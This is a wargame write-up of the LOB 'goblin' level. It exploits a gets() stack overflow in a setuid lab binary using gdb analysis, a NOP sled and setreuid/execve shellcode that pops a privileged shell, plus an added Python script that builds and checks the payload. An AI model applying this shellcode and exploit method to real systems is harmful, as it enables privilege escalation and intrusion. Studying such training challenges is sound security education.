

[LOB] cobolt

 

Intro

This is cobolt, the third monster!!

After a month of pwnables, the basics are, well... heh.

Let's knock it out quickly!

Write UP

[cobolt@localhost cobolt]$ ll 
total 16 
-rwsr-sr-x    1 goblin   goblin      11824 Feb 26  2010 goblin 
-rw-r--r--    1 root     root          193 Mar 29  2010 goblin.c

[cobolt@localhost cobolt]$ cat goblin.c 
/* 
        The Lord of the BOF : The Fellowship of the BOF 
        - goblin 
        - small buffer + stdin 
*/ 

int main() 
{ 
    char buffer[16]; 
    gets(buffer); 
    printf("%s\n", buffer); 
}

Unlike the two previous challenges, this one reads its input with gets().

The only real difference is whether the input arrives as an argument or on stdin. That changes how the payload is delivered (through a pipe instead of on the command line) and which bytes are off-limits: gets() stops only at a newline (0x0a), so NUL bytes, which strcpy() would have cut on, pass through untouched.

Shall we peek at memory with gdb? Copy the binary to /tmp first (the copy drops the setuid bit, so it can be debugged as cobolt) and take it apart.

[cobolt@localhost cobolt]$ gdb -q /tmp/goblin 
(gdb) set disassembly-flavor intel 
(gdb) disas main 
Dump of assembler code for function main: 
0x80483f8 <main>:       push   %ebp 
0x80483f9 <main+1>:     mov    %ebp,%esp 
0x80483fb <main+3>:     sub    %esp,16 
0x80483fe <main+6>:     lea    %eax,[%ebp-16] 
0x8048401 <main+9>:     push   %eax 
0x8048402 <main+10>:    call   0x804830c <gets> 
0x8048407 <main+15>:    add    %esp,4 
0x804840a <main+18>:    lea    %eax,[%ebp-16] 
0x804840d <main+21>:    push   %eax 
0x804840e <main+22>:    push   0x8048470 
0x8048413 <main+27>:    call   0x804833c <printf> 
0x8048418 <main+32>:    add    %esp,8 
0x804841b <main+35>:    leave 
0x804841c <main+36>:    ret 
0x804841d <main+37>:    nop 
0x804841e <main+38>:    nop 
0x804841f <main+39>:    nop

It reserves exactly the buffer size, 16 bytes, with no padding!

So buffer[16] sits at ebp-16, the saved EBP right after it at ebp, and the return address at ebp+4: RET starts 20 bytes into the input.

Same as before, we'll ride a NOP sled, right? Fill the 20 bytes up to RET with A's, put B's in the RET slot, then C's after it to mark where the sled will land, and look at the addresses.

[cobolt@localhost cobolt]$ gdb -q /tmp/goblin 
(gdb) b *main+15 
Breakpoint 1 at 0x8048407 
(gdb) r 
Starting program: /tmp/goblin 
AAAAAAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 

Breakpoint 1, 0x8048407 in main () 
(gdb) x/100wx $ebp-16 
0xbffffb38:     0x41414141      0x41414141      0x41414141      0x41414141 
0xbffffb48:     0x41414141      0x42424242      0x43434343      0x43434343 
0xbffffb58:     0x43434343      0x43434343      0x43434343      0x43434343 
0xbffffb68:     0x43434343      0x43434343      0x43434343      0x43434343 
0xbffffb78:     0x43434343      0x00434343      0x0804844c      0x4000ae60 
0xbffffb88:     0xbffffb8c      0x40013e90      0x00000001      0xbffffc7f 
0xbffffb98:     0x00000000      0xbffffc8b      0xbffffc9c      0xbffffcbb 
0xbffffba8:     0xbffffcdd      0xbffffce9      0xbffffeac      0xbffffecb 
0xbffffbb8:     0xbffffee7      0xbffffefc      0xbfffff1a      0xbfffff25 
0xbffffbc8:     0xbfffff34      0xbfffff3c      0xbfffff4d      0xbfffff57 
0xbffffbd8:     0xbfffff65      0xbfffff76      0xbfffff84      0xbfffff8f 
0xbffffbe8:     0xbfffffa1      0x00000000      0x00000003      0x08048034 
0xbffffbf8:     0x00000004      0x00000020      0x00000005      0x00000006 
0xbffffc08:     0x00000006      0x00001000      0x00000007      0x40000000 
0xbffffc18:     0x00000008      0x00000000      0x00000009      0x08048350 
0xbffffc28:     0x0000000b      0x000001f6      0x0000000c      0x000001f6 
0xbffffc38:     0x0000000d      0x000001f6      0x0000000e      0x000001f6 
0xbffffc48:     0x00000010      0x0f8bfbff      0x0000000f      0xbffffc7a 
0xbffffc58:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc68:     0x00000000      0x00000000      0x00000000      0x00000000 
0xbffffc78:     0x36690000      0x2f003638      0x2f706d74      0x6c626f67 
0xbffffc88:     0x50006e69      0x2f3d4457      0x656d6f68      0x626f632f 
0xbffffc98:     0x00746c6f      0x54534f48      0x454d414e      0x636f6c3d 
0xbffffca8:     0x6f686c61      0x6c2e7473      0x6c61636f      0x616d6f64 
0xbffffcb8:     0x4c006e69      0x4f535345      0x3d4e4550      0x73752f7c

I picked 0xbffffb68! It lies in the C region just past the RET slot, so it will fall inside the 100-byte NOP sled.

Off to write the payload!!

Since the program reads from stdin, I pipe the payload in with | and follow it with cat, so that once the shell pops stdin stays open and I can keep typing commands.

[cobolt@localhost cobolt]$ (python -c 'print "A" * 20 + "\x68\xfb\xff\xbf" + "\x90" * 100 + "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'; cat) | ./goblin 
AAAAAAAAAAAAAAAAAAAAh... (printf echoes the payload back; the address, NOP and shellcode bytes are non-printable and render as garbage)
id 
uid=503(goblin) gid=502(cobolt) egid=503(goblin) groups=502(cobolt) 
/bin/my-pass 
euid = 503 
hackers proof
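As an added example (not the author's code, and not part of the original post), here is the payload construction above redone in Python 3 with the checks a practitioner wants before firing it: the RET offset derived from the frame layout and cross-checked against the gdb dump, the sled's address range computed from the buffer address seen in gdb, and a scan for the one byte gets() cannot pass through (0x0a). The shellcode, dump excerpt and addresses are the ones on this page; the function names and the two-line dump constant are my own.

```python
import struct

# Frame layout recovered from the disassembly on this page:
#   sub esp,16 / lea eax,[ebp-16]  -> buffer is 16 bytes at ebp-16
#   saved ebp at ebp (4 bytes), return address at ebp+4
BUF_SIZE = 16
SAVED_EBP = 4
RET_OFFSET = BUF_SIZE + SAVED_EBP  # 20 bytes of filler before the RET slot

# The 47-byte shellcode used in the write-up, annotated:
# setreuid(geteuid(), geteuid()); execve("/bin//sh", ["/bin//sh"], NULL); exit()
SHELLCODE = (
    b"\x31\xc0\xb0\x31\xcd\x80"          # xor eax,eax ; mov al,49 ; int 0x80   -> geteuid()
    b"\x89\xc3\x89\xc1"                  # mov ebx,eax ; mov ecx,eax
    b"\x31\xc0\xb0\x46\xcd\x80"          # xor eax,eax ; mov al,70 ; int 0x80   -> setreuid(euid, euid)
    b"\x31\xc0\x50"                      # xor eax,eax ; push eax  (NUL terminator for the string)
    b"\x68\x2f\x2f\x73\x68"              # push "//sh"
    b"\x68\x2f\x62\x69\x6e"              # push "/bin"
    b"\x89\xe3\x50\x53\x89\xe1\x89\xc2"  # mov ebx,esp ; push eax ; push ebx ; mov ecx,esp ; mov edx,eax
    b"\xb0\x0b\xcd\x80"                  # mov al,11 ; int 0x80                  -> execve
    b"\x31\xc0\xb0\x01\xcd\x80"          # xor eax,eax ; mov al,1 ; int 0x80    -> exit
)

# gets() terminates only on '\n'; unlike strcpy(), a NUL byte does not cut the input.
GETS_BAD_BYTES = {0x0a}

# Constructed excerpt of the `x/100wx $ebp-16` dump shown above (first two rows).
DUMP = """\
0xbffffb38:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffb48:     0x41414141      0x42424242      0x43434343      0x43434343
"""


def bad_bytes(blob, bad=GETS_BAD_BYTES):
    """Offsets of bytes that would truncate the payload when read by gets()."""
    return [i for i, b in enumerate(blob) if b in bad]


def build_payload(ret_addr, nop_len=100, shellcode=SHELLCODE):
    """Filler up to RET, the new return address (little-endian), NOP sled, shellcode."""
    return b"A" * RET_OFFSET + struct.pack("<I", ret_addr) + b"\x90" * nop_len + shellcode


def sled_range(buffer_addr, nop_len=100):
    """Half-open address range the NOP sled occupies when the buffer starts at buffer_addr."""
    start = buffer_addr + RET_OFFSET + 4  # sled begins right after the 4-byte RET slot
    return start, start + nop_len


def ret_hits_sled(ret_addr, buffer_addr, nop_len=100):
    """True if jumping to ret_addr lands somewhere on the sled (any NOP slides into the shellcode)."""
    lo, hi = sled_range(buffer_addr, nop_len)
    return lo <= ret_addr < hi


def ret_offset_from_dump(dump, buffer_addr, marker=0x42424242):
    """Locate the word holding the 'BBBB' marker in an `x/wx` dump; return its offset from the buffer."""
    for line in dump.splitlines():
        if not line.strip():
            continue
        addr_txt, *words = line.split()
        base = int(addr_txt.rstrip(":"), 16)
        for i, word in enumerate(words):
            if int(word, 16) == marker:
                return base + 4 * i - buffer_addr
    return None


if __name__ == "__main__":
    buffer_addr = 0xBFFFFB38          # $ebp-16 as seen in gdb on this page
    ret_addr = 0xBFFFFB68             # the author's choice
    print("RET offset from dump:", ret_offset_from_dump(DUMP, buffer_addr))
    print("sled range: 0x%08x-0x%08x" % sled_range(buffer_addr))
    print("0x%08x on sled:" % ret_addr, ret_hits_sled(ret_addr, buffer_addr))
    payload = build_payload(ret_addr)
    print("payload bytes:", len(payload), "bad offsets:", bad_bytes(payload))
    # A return address that happens to contain 0x0a would be cut by gets():
    print("0xbffffb0a bad offsets:", bad_bytes(build_payload(0xBFFFFB0A)))
```

The bad-byte scan is what you would extend for the later, strcpy-based levels (add 0x00 to the set); for gets() only the newline matters, which is also why the payload is fed through a pipe rather than typed interactively. To reproduce the run above, write the payload to a file with `open("p", "wb").write(build_payload(0xBFFFFB68))` and feed it with `(cat p; cat) | ./goblin`.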

Exploit!!

Wrap-up

Easy! It reminds me of solving the bof challenge on pwnable.kr a month ago T_T

On to the next challenge!! Thanks :D
